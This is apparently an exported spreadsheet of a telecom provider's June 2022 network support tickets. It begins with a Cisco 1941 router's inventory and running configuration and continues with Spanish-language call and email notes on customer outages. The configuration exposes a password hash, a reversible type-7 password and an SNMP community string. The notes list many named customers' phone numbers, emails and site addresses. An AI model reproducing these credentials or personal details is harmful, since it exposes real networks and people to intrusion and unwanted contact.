*1        CISCO1941/K9          FJC2225L3A7
SUITE LICENSE INFORMATION FOR MODULE:'C1900'
--------------------------------------------------------------------------------
SUITE                 SUITE CURRENT         TYPE           SUITE NEXT REBOOT
--------------------------------------------------------------------------------
FOUNDATIONSUITEK9     NONE                  NONE           NONE
SECURITYK9
DATAK9
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
------------------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE                  TECHNOLOGY-PACKAGE
              CURRENT              TYPE           NEXT REBOOT
------------------------------------------------------------------------
IPBASE        IPBASEK9             PERMANENT      IPBASEK9
SECURITY      NONE                 NONE           NONE
DATA          NONE                 NONE           NONE
CONFIGURATION REGISTER IS 0X2102
DATOS_MINED_DELEGACION_DI#SH INVENTORY
NAME: "CISCO1941/K9", DESCR: "CISCO1941/K9 CHASSIS, HW SERIAL#: FJC2225L3A7, HW REVISION: 1.0"
PID: CISCO1941/K9      , VID: V05 , SN: FJC2225L3A7
NAME: "C1941/C2901 AC POWER SUPPLY", DESCR: "C1941/C2901 AC POWER SUPPLY"
PID: PWR-1941-2901-AC  , VID:    , SN:
DATOS_MINED_DELEGACION_DI#SH PROCESSES CPU HISTORY
DATOS_MINED_DELEGACION_DI   03:43:28 PM WEDNESDAY JUN 8 2022 UTC
       11111                              11111     44444
  100
   90
   80
   70
   60
   50
   40
   30
   20
   10
     0....5....1....1....2....2....3....3....4....4....5....5....6
               0    5    0    5    0    5    0    5    0    5    0
               CPU% PER SECOND (LAST 60 SECONDS)
      4111111112
  100
   90
   80
   70
   60
   50
   40
   30
   20
   10
     0....5....1....1....2....2....3....3....4....4....5....5....6
               0    5    0    5    0    5    0    5    0    5    0
               CPU% PER MINUTE (LAST 60 MINUTES)
              * = MAXIMUM CPU%   # = AVERAGE CPU%
  100
   90
   80
   70
   60
   50
   40
   30
   20
   10
     0....5....1....1....2....2....3....3....4....4....5....5....6....6....7..
               0    5    0    5    0    5    0    5    0    5    0    5    0
                   CPU% PER HOUR (LAST 72 HOURS)
                  * = MAXIMUM CPU%   # = AVERAGE CPU%
DATOS_MINED_DELEGACION_DI# SH RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 1984 BYTES
!
VERSION 15.6
SERVICE CONFIG
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME DATOS_MINED_DELEGACION_DI
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$VXZ/$1JXSJEF6JQFVWPHBOIMBD.
!
NO AAA NEW-MODEL
ETHERNET LMI CE
!
!
!
!
!
!
!
!
!
!
!
!
IP CEF
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
LICENSE UDI PID CISCO1941/K9 SN FJC2225L3A7
!
!
USERNAME ADMINDX PASSWORD 7 080148430017010F
!
REDUNDANCY
!
!
!
CLASS-MAP MATCH-ALL DATOS
 MATCH ACCESS-GROUP NAME BW_DATOS
!
POLICY-MAP BW_LIMIT
 CLASS DATOS
  POLICE 5120000 960000 1920000 CONFORM-ACTION TRANSMIT  EXCEED-ACTION DROP
 CLASS CLASS-DEFAULT
  POLICE 15360000 2880000 5760000 CONFORM-ACTION TRANSMIT  EXCEED-ACTION DROP
!
!
!
!
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN CLARO
 IP ADDRESS 10.15.96.7 255.255.255.224
 DUPLEX AUTO
 SPEED AUTO
 SERVICE-POLICY INPUT BW_LIMIT
 SERVICE-POLICY OUTPUT BW_LIMIT
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN CLIENTE
 IP ADDRESS 172.16.25.1 255.255.255.0
 DUPLEX AUTO
 SPEED AUTO
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.15.96.1
!
IP ACCESS-LIST EXTENDED BW_DATOS
 PERMIT IP 172.16.25.0 0.0.0.255 10.228.210.128 0.0.0.127
 PERMIT IP 172.16.25.0 0.0.0.255 10.229.6.128 0.0.0.127
 PERMIT IP 10.228.210.128 0.0.0.127 172.16.25.0 0.0.0.255
 PERMIT IP 10.229.6.128 0.0.0.127 172.16.25.0 0.0.0.255
!
!
!
SNMP-SERVER COMMUNITY MINED_MPLS RO 19
ACCESS-LIST 19 REMARK SOLAR_WINDS
ACCESS-LIST 19 PERMIT 190.212.133.254
ACCESS-LIST 19 PERMIT 192.168.0.2
!
CONTROL-PLANE
!
!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DATOS_MINED_DELEGACION_DI#</t>
  </si>
  <si>
    <t>CLIENTE SR. MARIO 87337879 INFORMA QUE SE DAÑO SU SW, PROCEDE A CONSEGUIR OTRO SW, SOLICITA REGRESAR LA LLAMADA A LAS 11 AM AL 88785034, TOMAR EN CUENTA QUE ES PROBLEMA LAN, UNICAMENTE SE ESTA APOYANDO PARA QUE CLIENTE LOGRE SOLVENTAR SU LAN PARA QUE PROCEDE CON VALIDACION.</t>
  </si>
  <si>
    <t>CLIENTE SR. MARIO  88785034 CONECO Y CONFIGURO SU LAN REALIZO PRUEBAS Y VALIDA QUE A NIVEL DE CLARO TODO ESTA BIEN, AUTORIZA EL CIERRE DEL INCIDENTE. ID: 2001026570.
DATOS_MINED_DELEGACION_DI#SH ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.15.96.1              2   5087.895D.5745  ARPA   GIGABITETHERNET0/0
INTERNET  10.15.96.7              -   780C.F0B0.4020  ARPA   GIGABITETHERNET0/0
INTERNET  172.16.25.1             -   780C.F0B0.4021  ARPA   GIGABITETHERNET0/1
INTERNET  172.16.25.15            0   B42E.998F.F3E3  ARPA   GIGABITETHERNET0/1
DATOS_MINED_DELEGACION_DI#
B42E.998F.F3E3
GIGA-BYTE TECHNOLOGY CO.,LTD.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LESTER AL 87704872 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
ID 1001853530
**</t>
  </si>
  <si>
    <t>F4592873</t>
  </si>
  <si>
    <t>SE TIENE A CLENTE EN LINEA AMABILIA CASTILLO-54981769  ###  REALIZA PRUEBAS Y VALIDA QUE YA TIENE LLAMADAS ENTRANTES Y SALIENTES ##
1001724724
COLA:
NOMBRE: A: 54981769
NÚMERO: 54981769
DURACIÓN: 0:01:11
ESTADO: CONECTADA
DETALLES: 54981769
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 7/06/2022 10:03:43</t>
  </si>
  <si>
    <t>F4592877</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, CON DIAGNÓSTICO, SE QUEDA A ESPERA DE RESPUESTA
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: MARTES, 7 DE JUNIO DE 2022 10:29
PARA: ERNESTO.ASCENCIO@MCLOGISTICA.COM &lt;ERNESTO.ASCENCIO@MCLOGISTICA.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: MC LOGISTICA EL SALVADOR S.A. DE C.V. | ID1031203SV | SD1132649
BUENOS DÍAS, ESTIMADO CLIENTE.
EN SEGUIMIENTO AL SERVICIO REPORTADO SE ADJUNTA LAS SIGUIENTES CAPTURAS DONDE SE VALIDAN CAÍDAS DE INTERFAZ LAN   GIGABITETHERNET0/1,  EL  DÍA DE HOY JUN  7 06:33:49.930. TAMBIÉN, SE VALIDA EQUIPO  UBIQUITI, ASOCIADOS  CON IP 201.247.110.149 Y MAC B4FB.E42F.2733. SE CUENTA CON SALIDA HACIA INTERNET, POR LO QUE DEBE REVISAR EQUIPOS INTERNOS.
EQUIPO UBIQUITI ASOCIADO.
SE VALIDAN CAÍDAS DE INTERFAZ LAN DEL CLIENTE
SE CUENTA CON SALIDA HACIA INTERNET.
QUEDAREMOS ATENTOS A SUS COMENTARIOS PARA PODER PROCEDER AL CIERRE DEL CASO YA QUE POR PARTE DE CLARO NO HAY ACCIONES QUE REALIZAR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 7 DE JUNIO DE 2022 11:31
PARA: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;; ERNESTO.ASCENCIO@MCLOGISTICA.COM &lt;ERNESTO.ASCENCIO@MCLOGISTICA.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: MC LOGISTICA EL SALVADOR S.A. DE C.V. | ID1031203SV | SD1132649
*-*-*-*-</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNESTO ASCENCIO AL 73085804 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001854615
**</t>
  </si>
  <si>
    <t>F4592880</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MARIELOS VILLATORO 22932323 RESPONDE GILLERMO MENCIONA QUE EL SERVICIO FUNCIONA BIEN PERO AL CONECTAR LAS CAMARAS ES CUANDO PRESENTAN LA LENTITUD
SE LE BRINDA INFORMACION DE DIAGNOSTICO POR LO QUE CLIENTE SOLICITA SE PUEDA COMPARTIR POR CORREO LAS PRUEBAS DE STURACION Y LAS IP CON MAYOR CONSUMO
CONTABILIDAD@@DIESA.COM.SV ---  MARIELOS_VILLATORO@DIESA.COM.SV
-ID 1001734228</t>
  </si>
  <si>
    <t>F4592894</t>
  </si>
  <si>
    <t>** SE LLAMA A CLIENTE RONY RUIZ AL 3080-3719 ENVIA A BUZON || SE INTENTARA LUEGO **
ID 1001738605
**</t>
  </si>
  <si>
    <t>F4592895</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DENIA ROBLES 94368767 MENCIONA QUE NO CUENTAN CON ENERGIA PERO ESTAN TRABAJANDO CON PLANTA
-ID 1001762623
NOMBRE DEL CLIENTE: COOPERATIVA MIXTA OCOTEPEQUE LIMITADA -
UBICACIÓN:BARRIO CONCEPCION, CUCUYAGUA COPAN CONTIGUO A FERRETERIA CUCUYAGUA
CONTACTO EN SITIO: DENIA ROBLES - 94368767
HORARIO DE ATENCION:8:00 - 16:00
GESTIÓN DE PERMISOS: DATOS DE PERSONAL TECNICO -- EDGAR_ERNAN@YAHOO.COM</t>
  </si>
  <si>
    <t>F4592904</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE IRMA DE ORTIZ AL 58378574 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001471157
**</t>
  </si>
  <si>
    <t>F4592919</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SCARLET MANZANERO 41753805 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 1001770353</t>
  </si>
  <si>
    <t>F4592930</t>
  </si>
  <si>
    <t>****SE LLAMA A CLIENTE JONATHAN ISMAEL SÁNCHEZ MAYORGA  AL 4211 6235 INDICA QUE VA A VALIDAR SI CUENTAN CON ERNERGIA PERO SE CORTA LLAMADA SE INTENTARA LUEGO **
ID 1001746590
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JONATHAN ISMAEL SÁNCHEZ MAYORGA  AL 4211 6235 INDICA QUE NO HAY ENERGIA EN EL SECTOR **
ID 1001761488
**</t>
  </si>
  <si>
    <t>F4592936</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUAN CARLOS PALALA AL 59317822 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001760188
**</t>
  </si>
  <si>
    <t>F4592941</t>
  </si>
  <si>
    <t>CLIENTE JUAN CARLOS PALALA 59317822 REALIZA PRUEBAS DE LLAMADAS Y VALIDA EL E1 OPERATIVO, AUTORIZA EL CIERRE DEL CASO. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4592949</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAUL GONZALEZ AL 78843080 - 26841800 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001767984 - 1001768894
**</t>
  </si>
  <si>
    <t>F4592952</t>
  </si>
  <si>
    <t>F4592959</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SAUL GONZALEZ AL 78843080 INDICA QUE AUN SIGUE CON INCONVENIENTE SIGUE CAIDO EL SERVICIO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE**
-ID 1001769299
**</t>
  </si>
  <si>
    <t>F4592961</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ELVIN MENDOZA 85914361 SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
ID 1001857625
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELVIN MENDOZA 85914361 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001951889</t>
  </si>
  <si>
    <t>F4592964</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAUL GONZALEZ 78843080 MENCIONA QUE PERSISTE EL INCONVENIENTE, CLIENTE EN LA LLAMADA APLICA REINICIO PERO NO RESTABLECE
-ID 1001748257
NOMBRE DEL CLIENTE: ALCALDIA MUNICIPAL DE CONCHAGUA
UBICACIÓN: CALLE GENERAL GERARDO BARRIOS CONCHAGUA  LA UNION FRENTE AL PARQUE CENTRAL DE CONCHAGUA
CONTACTO EN SITIO: SAUL GONZALEZ - 78843080
HORARIO DE ATENCION:HASTA LAS 16:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 78534820 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA SE LLAME A SAUL GONZALEZ 78843080
-ID 1001747483</t>
  </si>
  <si>
    <t>F4592965</t>
  </si>
  <si>
    <t>SE LLAMA A DANIEL INDICA LLAMADA EN 10 MINUTOS ESTARA CONSULTANDO EN SITIO--</t>
  </si>
  <si>
    <t>F4592971</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DORIS MARTINEZ 50171607  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001746091</t>
  </si>
  <si>
    <t>F4592973</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE
CASO: SD1132611 ///25269000/DEFENSORIA DEL CONSUMIDOR
ESTIMADO CLIENTE CON RESPECTO DEL E1
25269000
DEFENSORIA DEL CONSUMIDOR
SE HAN TENIDO DOS REPORTES, EL DÍA DE AYER  06/06 Y EL DÍA DE HOY 07/06, AMBOS REPORTES SE MANEJARON BAJO EL NUMERO DE TICKET SD1132611.
EN EL REPORTE DEL DÍA DE AYER, SE TUVO UNA AFECTACIÓN A NIVEL DE CLARO, VARIOS CLIENTES ESTABAN PRESENTADO INTERMITENCIA EN SUS LLAMADAS. ESTA AFECTACIÓN FUE SOLVENTADA POR NUESTRO PERSONAL ESPECIALISTA.
EL DÍA DE HOY, COMO AUN PRESENTABAN INCONVENIENTES CON EL SERVICIO SE PROCEDIÓ A ENVIAR PERSONAL TÉCNICO A REALIZAR UNA REVISIÓN COMPLETA. EL TÉCNICO EN NUESTRA CENTRAL REALIZO LA MEDICIÓN DE LOS PARÁMETROS DEL COBRE CON QUE SE LES ENTREGA EL E1 Y TODOS ESTÁN DENTRO DEL RANGO CORRECTO, ADEMÁS SE REALIZARON MEDICIONES AL PUERTO DE TRANSMISIÓN Y NO SE PERCIBEN ERRORES. EL TÉCNICO SE MOVILIZÓ A SUS INSTALACIONES DONDE REALIZO PRUEBAS CON EL EQUIPO AURORA Y NO SE PERCIBIERON ERRORES EN EL E1. SE RECOMIENDAN PUEDAN ESCALAR CON EL PROVEEDOR DE SU PBX PARA UNA REVISIÓN DE SU EQUIPO Y SI REQUIEREN ALGUNA VISITA EN CONJUNTO FAVOR INFORMAR FECHA  Y HORA PARA PROGRAMARLA.
SALUDOS.</t>
  </si>
  <si>
    <t>F4592974</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DILBERTH LOPEZ  AL 9937-8046 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001776803
**</t>
  </si>
  <si>
    <t>F4592981</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE DESDE EL VIVO, Y SE REALIZARON PRUEBAS DE LLAMADAS. CLIENTE INDICA QUE LAS QUE NO COMPLETAN AHORA SON
NUMERO DE ORIGEN: 22502000
DESTINO: 22502000
FECHA: 7/06/22
HORA: 17:36
COMENTARIO: SU LLAMADA NO PUEDE SER REALIZADA PORQUE SE TIENEN OTRAS LLAMADAS EN CURSO.
SE REVISARON LAS TRONCALES Y SOLO UNA LLAMADA TENIA.
NUMERO DE ORIGEN: 22502000
DESTINO: 22506700
FECHA: 7/06/22
HORA: 17:36
COMENTARIO: SU LLAMADA NO PUEDE SER REALIZADA PORQUE SE TIENEN OTRAS LLAMADAS EN CURSO.
SE REVISARON LAS TRONCALES Y SOLO UNA LLAMADA TENIA.
SALUDOS.
SE ENVIO CORREO AL PERSONAL DE AVI.</t>
  </si>
  <si>
    <t>CLIENTE REALIZA UNA LLAMADA AL NUMERO 22026700 Y LE DA EL MENSAJE DE QUE NO POSEE SALDO.
SE LLAMO DESDE EL VIVO A ESTE NUMERO Y SI COMPLETA LA LLAMADA.</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE EDUARDO MARTINEZ LOPEZ. QUIEN INDICA QUE YA PUEDE SACAR LLAMADAS A LOS NUMEROS QUE NO PODIA ANTES.
SOLICITA QUE SE CIERRE EL TICKET Y QUE SI TIENE ALGUN OTRO PROBLEMA ESTARA REPORTANDO NUEVAMENTE.
2001041696
COLA:
NOMBRE: A: 0050379100154
NÚMERO: 0050379100154
DURACIÓN: 0:00:11
ESTADO: CONECTADA
DETALLES: 0050379100154
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 8/06/2022 14:34:05</t>
  </si>
  <si>
    <t>F4592992</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  EDDY PALENCIA 2420 7200 EXT. 2651 OPERADORA INDICA QUE ES EXT. INCORRECTA**
ID 1001796359
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  EDDY PALENCIA 2420 7200 EXT. 2651 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001778337
**</t>
  </si>
  <si>
    <t>F4593008</t>
  </si>
  <si>
    <t>**SE LLAMA A SANDRA VICTORIA FUENTES BOBADILLA 58261426 NO RESPONDE ENVIA A BUZON **
-ID 2001075439
**</t>
  </si>
  <si>
    <t>SE LLAMÓ DE NUEVO A EJECUTIVA CLARO 58261426 PARA SEGUIMIENTO, NO CONTESTA; SE LLAMÓ A JUAN CARLOS GABRIEL/CLIENTE 50179197 PIDE SE LE LLAME MAÑANA A LAS 09:00AM PARA SEGUIMIENTO Y/O VALIDAR SERVICIO. HAY CORREO SEGUIMIENTO:
ASUNTO: RE: INTERNET CORPORATIVO</t>
  </si>
  <si>
    <t>SE LLAMA A SANDRA VICTORIA FUENTES - 58261426  NO RESPONDE, SE INTENTARA LUEGO
-ID 1001844360</t>
  </si>
  <si>
    <t>SE LLAMÓ A EJECUTIVA 58261426 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE. ADICIONAL SE PIDE APOYO VÍA CORREO:
ASUNTO: RE: INTERNET CORPORATIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL CONTACTO CL COMPARTE CONTACTO 50179197. VIA VIVO   PROPORCIONADO VIA CORREO NO  SE TIENE RESPUESTA SE VALIDARA EN HORARIO HABIL</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 7 DE JUNIO DE 2022 17:32
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;; CLARO CORPORACIONES &lt;CLAROCORPORACIONES@CLARO.COM.GT&gt;; SANDRA VICTORIA FUENTES BOBADILLA &lt;SANDRAV.FUENTES@CLARO.COM.GT&gt;
CC: 'JUAN CARLOS GABRIEL MEDINA' &lt;IT@MAJADAS.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; DAVID ANDREE LARRAÑAGA CHINCHILLA &lt;DAVID.LARRANAGA@CLARO.COM.GT&gt;
ASUNTO: RE: INTERNET CORPORATIVO
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A SANDRA VICTORIA FUENTES 58261426 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001868266</t>
  </si>
  <si>
    <t>SE LLAMÓ DE NUEVO A EJECUTIVA 58261426 PARA VALIDAR LO DICHO EN CRONO ANTERIOR, NO CONTESTA; FUERA DE HORARIO LABORAL, LLAMAR MAÑANA A PARTIR DE LAS 08:00AM</t>
  </si>
  <si>
    <t>F4593010</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE THOMSON ( TECNICO ) AL 57264358  INDICA QUE ESTAN TRASLADANDOSE DE UN EDIFICIO A OTRO Y ELLOS HABIAN SOLICITADO UN TRASLADO Y POR ESO SE VE DOWN**
ID 1001754576
**</t>
  </si>
  <si>
    <t>F4593011</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
RE: 369700007T - FUNDACION PRO BIENESTAR DEL MINUSVALIDO</t>
  </si>
  <si>
    <t>F4593014</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUSTABO MAZARIEGO 30718040 VALIDA SERVICIO OPERATIVO Y ESTABLE, AUTORIZA CIERRE DE TICKET
1001820001
COLA:
NOMBRE: A: 30718040
NÚMERO: 011 50230718040
DURACIÓN: 0:01:01
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NORMAL, ESPECIFICADA (CÓDIGO CAUSA ISDN31)]
DETALLES: +50230718040
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 7/06/2022 14:46:25
REPORTE::::: CAIDA TOTAL
CAUSA RAIZ:: EL SERVICIO ESTUVO AFECTADO POR CORTE DE FO
SOLUCION:::: PERSONAL  TECNICO MARLON MUÑOZ, INDICA QUE SE TENIA CFO A 62 METROS DE CLIETE OCASIONADO POR POSIBLE DAÑO AL MANIPULAR FIBRAS, SERVICIO OPERATIVO Y ESTABLE LUEGO DE FINALIZAR REPARACIONES</t>
  </si>
  <si>
    <t>F4593033</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA KARLA RODRÍGUEZ-78415318 ##  COMENTA QUE ESTA EN ALMUERZO Y SE RETOME A LAS 13:30##
1001766877
COLA:
NOMBRE: A: 0050378415318
NÚMERO: 0050378415318
DURACIÓN: 0:01:06
ESTADO: CONECTADA
DETALLES: 0050378415318
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 7/06/2022 11:57:16</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA  KARLA RODRÍGUEZ-78415318
1001792562
COLA:
NOMBRE: A: 0050378415318
NÚMERO: 0050378415318
DURACIÓN: 0:01:19
ESTADO: CONECTADA
DETALLES: 0050378415318
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 7/06/2022 13:17:38</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  KARLA RODRÍGUEZ-78415318 NO RESPONDE, ENVIA A BUZON  SE INTENTARA LUEGO
-ID 1001836764 - 1001836983</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KARLA RODRÍGUEZ-78415318 INDICA QUE REALIZARA PRUEBAS Y PIDE VALIDAR EN 10 MINUTOS ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENT KARLA RODRÍGUEZ-78415318 ##CLIENTE VALIDA ##VIVO</t>
  </si>
  <si>
    <t>F4593038</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR 56999808  NO RESPONDE || ENVIA DIRECTO A BUZON ||
SE INTENTARA LUEGO **
ID 1001796903
**</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL WALTER REYES 45787911 QUIEN BRINDA OTRO CONTACTO DE PR 56999801
-ID 1001818189</t>
  </si>
  <si>
    <t>SE HABLA CON WALTER REYES 45787911 MENCIONA QUE AUN NO CUENTA CON OTRO NUMERO DE PR AL CONTAR CON ALGUN NUMERO LO ESTARA COMPARTIENDO POR CORREO
-ID 1001832084</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 56999808 ENVIA DIRECTO A BUZON
-ID 1001780165</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 56999801  MENCIONA QUE ES DEL G396
-ID 1001822391</t>
  </si>
  <si>
    <t>F4593041</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 7 DE JUNIO DE 2022 13:12
PARA: JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; SANCHEZ MANRRIQUEZ MARIA GUADALUPE &lt;MSMANRRI@UNINET.COM.MX&gt;; DARWIN HUSSEIN ESPANA NORIEGA &lt;DARWINH.ESPANA@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCSCT0001IN-TDA ::: TICKET CNOC IMSCI002986 ::: "LATENCIA"
*-*-*-*</t>
  </si>
  <si>
    <t>F4593045</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO SERRANO 41706143 MENCIONA QUE YA TODO ESTA FUNCIONANDO BIEN PERO SE VALIDA CON GESTOR QUE EST SATURANDO CLIENTE SOLICITA POR CORREO LAS PRUEBAS
SOPORTE@GRUPOSERMESA.COM
-ID 1001927475</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO SERRANO 41706143 MENCIONA QUE EL SERVICIO ESTA FUNCIONANDO BIIEN PERO SI PRESENTA ALGUN PROBLEMA EN LA TARDE SE ESTARA CONTACTANDO POR MEDIO DE CC
SI NO PRESENTARA NINGUN PROBLEMA POR LA TARDE SOLICITA SE VALIDE MAÑANA A LAS  9:00 HRS
-ID 1001777681</t>
  </si>
  <si>
    <t>F4593048</t>
  </si>
  <si>
    <t>SE LLAMAA CLIENTE LUIS LOPEZ 94768245 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001780815</t>
  </si>
  <si>
    <t>F4593049</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AMILKAR PEREIRA AL 55028645  - 89999871  INDICA QUE EL SERVICIO SE ESTABLE Y SE CAE COMENTA QUE HACE COMO UN MES TIENE EL INCONVENIENTE DE QUE AL MENOS 12 VECES AL DIA EL SERVICIO SE CAE Y TARDA COMO 1O MIN EN VOLVER A RESTABLECERSE || SE NOTIFICA A GESTOR **
ID 1001797685 - 1001797887
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AMILKAR PEREIRA 89999871 NO RESPONDE || ENVIA A BUZON
SE INTENTARA LUEGO **
ID 1001780568
**</t>
  </si>
  <si>
    <t>F4593055</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MOISES MENDEZ  30727797 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001843362</t>
  </si>
  <si>
    <t>F4593067</t>
  </si>
  <si>
    <t>SE ESTA EN LINEA CON EL CLIENTE JAQUELINE GATICA
1001778829
COLA:
NOMBRE: A: 36588632
NÚMERO: 36588632
DURACIÓN: 0:00:08
ESTADO: MARCANDO
DETALLES: 36588632
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 7/06/2022 12:31:51</t>
  </si>
  <si>
    <t>F4593074</t>
  </si>
  <si>
